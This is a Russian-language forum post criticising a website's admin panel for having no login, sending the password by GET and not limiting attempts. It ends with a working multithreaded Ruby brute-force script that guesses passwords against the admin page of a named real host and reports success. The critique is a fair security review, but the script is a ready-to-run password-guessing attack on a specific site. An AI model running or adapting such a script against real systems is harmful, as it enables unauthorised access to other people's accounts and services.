02.04.2010, 06:14
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429
Репутация:
214
|
|
1.почему в админке не надо вводить логин - сразу минус
2.почему в админке пароль вводиться формой с методом GET - гигантский минус
какой-нить тип пробуртфорсит пароль и выложит где-нить ссылку и гугл проиндексирует админку, а может гугл и сам сможет подобрать пароль
3.почему нет ограничений на кол-ва ввода пароля, хотя бы какую-нить куку с попытками вводил или поля с рандомными именами.
и как следствие всего вышеупомянутого, многопоточный брутфорс под твою админку выглядит как HelloWorld!:
Код:
#!/usr/bin/ruby
require 'net/http'
th_count=50
for i in 0..100000 do
while Thread.list.size>th_count do sleep(1) end
Thread.new do
http=Net::HTTP.new('schoolmich.edu.ru.orange.intobservatory.ru', 80)
pass=i.to_s(36)
path="/admin/admin.php?password=#{pass}&doGo=%C2%EE%E9%F2%E8"
resp, data = http.get(path)
if !(data.include?("<body bgcolor=\"red\">"))
puts "#{pass} SUCCESS"
exit
end
puts "#{pass} FAILED"
end
end
|
|
|